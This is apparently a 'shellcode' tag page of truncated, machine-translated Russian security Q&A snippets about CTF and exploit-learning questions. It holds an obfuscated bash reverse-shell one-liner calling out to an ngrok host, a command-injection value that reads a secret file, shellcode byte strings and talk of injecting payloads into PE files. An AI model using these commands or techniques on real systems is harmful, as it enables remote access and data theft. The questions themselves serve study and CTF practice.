shellcode

Вопрос или проблема Для контекста Я использую этот скрипт на Python для выполнения шеллкода, который найден в loader.bin #!/usr/bin/env python3 import ctypes import ctypes.wintypes as wt import logging import platform # Настройка логирования logging.

Вопрос или проблема Итак, что я хочу сделать, в основном, это то, что делают BDFproxy и MSFvenom, я хочу модифицировать файл, чтобы внедрить в него другой PE и сделать так, чтобы оба работали, не имеет значения, работают ли они одновременно или после

Вопрос или проблема Я видел, как кто-то использует это в инъекции php shell: test | cat /var/backup/secret.txt Почему они используют test |? Как это не бесполезно здесь? Это просто бесполезное значение, иногда команда, которую вы внедряете, требует каких-то

Вопрос или проблема Я пытаюсь создать главный файл вот так: char main[] = "\xeb\x0d\x6a\x01\x58\x48\x89\xc7\x5e\x6a\x0c\x5a\x0f\x05\xff\xe8\xee\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x57\x6f\x72\x6c\x64\x21"; // опкод для Hello world в asm Я скомпилировал

Вопрос или проблема $(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27') -i: -c: строка 1: неожиданное EOF при поиске соответствующей `'' Я пытался получить обратный шелл таким образом для CTF

Вопрос или проблема Я нашел этот интересный вопрос: может ли уязвимость переполнения целого числа быть использована в атаке? Как мне на практике найти следующую инструкцию (в gdb), чтобы я мог перезаписать адрес возврата и выполнить оболочный код?

Вопрос или проблема Итак, я работаю над задачей в стиле CTF, и у меня есть следующий shellcode, работающий на машине mips32 lw $gp, -216($sp) \x28\xff\xbc\x8f slti $s8, $zero, -1 \xff\xff\x1e\x28 lw $t7, 0x01410630 \x41\x01\x0f\x3c\x30\x06\xef\x8d lw

Вопрос или проблема Я изучаю разработку шелкода на C на примере из здесь. Я могу скомпилировать ассемблерный код и получить опкоды, также я могу успешно запустить ELF, скомпилированный с NASM, но при запуске C-тестового приложения с встроенным шелкодом

Вопрос или проблема Я пытаюсь решить задачу stack-five на exploit.education (http://exploit.education/phoenix/stack-five/). Я столкнулся с проблемой при эксплуатации переполнения стека. Задача заключается в вызове execve(‘

Вопрос или проблема Существует ли эквивалент команды !pvefindaddr p2 (поиск всех комбинаций pop/pop/ret в пространстве памяти процесса) в mona.py? Кроме того, есть ли возможность запустить pvefindaddr в последних версиях Immunity Debugger?